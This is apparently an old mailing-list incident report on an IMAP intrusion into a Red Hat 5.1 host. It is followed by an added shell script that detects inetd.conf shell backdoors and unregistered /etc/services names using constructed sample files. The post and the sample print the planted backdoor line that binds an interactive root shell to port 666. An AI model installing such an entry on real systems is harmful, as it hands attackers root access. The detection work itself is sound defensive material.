IMAP attacks continue

An addendum to:

I found a machine running an unmodified Red Hat 5.1, and it got hit. So
I closed things off, looked around for damage and found the following:

1. Syslogd had been killed off and the syslog file deleted.

2. A backdoor was installed in /etc/inetd.conf as follows:

ttalk stream tcp nowait root /bin/sh sh -i

I checked the port assignments from IANA and there is no such thing as
"ttalk". I found this line in /etc/services:

ttalk 666/tcp

so it appears to be hijacking the port used by (as seen in the file

mdqs 666/tcp
mdqs 666/udp
doom 666/tcp doom Id Software
doom 666/udp doom Id Software

So also check /etc/services on any potentially compromised machines.

Btw. The best you can do is to install an access filter on the router and
log any attempts to connect to this port in your network; and if you
see such an attempt you should send a 'Hacker in your system (suspected)'
warning to the network admin of the site where the connection originated.

70% of these cases should be 'broken systems'.
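The two host checks from the first post above (inetd.conf entries that
hand out a shell, and /etc/services names that the reference port list
does not know) as an added shell example; this is not code from either
poster. The inetd.conf, /etc/services and reference-list files are
constructed samples written to a temp directory; on a suspect host you
would point the functions at the real /etc/inetd.conf, /etc/services and
a copy of the IANA port list instead.

```shell
#!/bin/sh
# Added example, not code from the original posts. Sample files are
# constructed here so the checks run offline; replace the paths with
# /etc/inetd.conf, /etc/services and an IANA port list on a real host.

SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

INETD_CONF="$SAMPLE_DIR/inetd.conf"       # constructed, one backdoor entry
LOCAL_SERVICES="$SAMPLE_DIR/services"     # constructed, as found on the host
IANA_SERVICES="$SAMPLE_DIR/iana-services" # constructed reference list

cat > "$INETD_CONF" <<'EOF'
# inetd.conf (constructed sample)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
imap    stream  tcp     nowait  root    /usr/sbin/tcpd  imapd
ttalk   stream  tcp     nowait  root    /bin/sh         sh -i
EOF

cat > "$LOCAL_SERVICES" <<'EOF'
# /etc/services (constructed sample with the planted entry)
ftp     21/tcp
telnet  23/tcp
imap    143/tcp
ttalk   666/tcp
EOF

cat > "$IANA_SERVICES" <<'EOF'
# reference port list (constructed sample)
ftp     21/tcp
telnet  23/tcp
imap    143/tcp
mdqs    666/tcp
mdqs    666/udp
doom    666/tcp    doom Id Software
doom    666/udp    doom Id Software
EOF

# Print inetd.conf entries whose server program is a shell, or whose
# arguments carry an interactive "-i" flag. Field layout is:
#   service socktype proto wait|nowait user server_path [args ...]
find_inetd_backdoors() {
    awk '!/^[[:space:]]*#/ && NF >= 6 &&
         ($6 ~ /(^|\/)(ba|k|c|tc|z)?sh$/ || $0 ~ /[[:space:]]-i([[:space:]]|$)/)' "$1"
}

# Print "name port/proto" for entries of the local services file (2nd arg)
# that the reference list (1st arg) does not register under that name and
# port. Anything printed deserves a look; a made-up name sitting on an
# assigned port is exactly the pattern from the post.
find_unknown_services() {
    awk '/^[[:space:]]*#/ || NF < 2 { next }
         { key = $1 " " $2 }
         FNR == NR { known[key] = 1; next }
         !(key in known) { print key }' "$1" "$2"
}

# Show what the reference list registers for a port/proto (e.g. 666/tcp),
# i.e. what the planted entry is standing in for.
lookup_port() {
    awk -v port="$2" '!/^[[:space:]]*#/ && $2 == port { print $1, $2 }' "$1"
}

echo "== inetd.conf entries that hand out a shell =="
find_inetd_backdoors "$INETD_CONF"
echo "== service names not in the reference list =="
find_unknown_services "$IANA_SERVICES" "$LOCAL_SERVICES" |
while read -r name port; do
    known=$(lookup_port "$IANA_SERVICES" "$port" | awk '{print $1}' | xargs echo)
    echo "$name $port (reference has: $known)"
done
```

The inetd check flags by the server program and its arguments rather than by service name, so it also catches the same backdoor hidden under a legitimate-looking name; the services check compares name and port together, so a renamed entry on an assigned port shows up even though the port itself is valid.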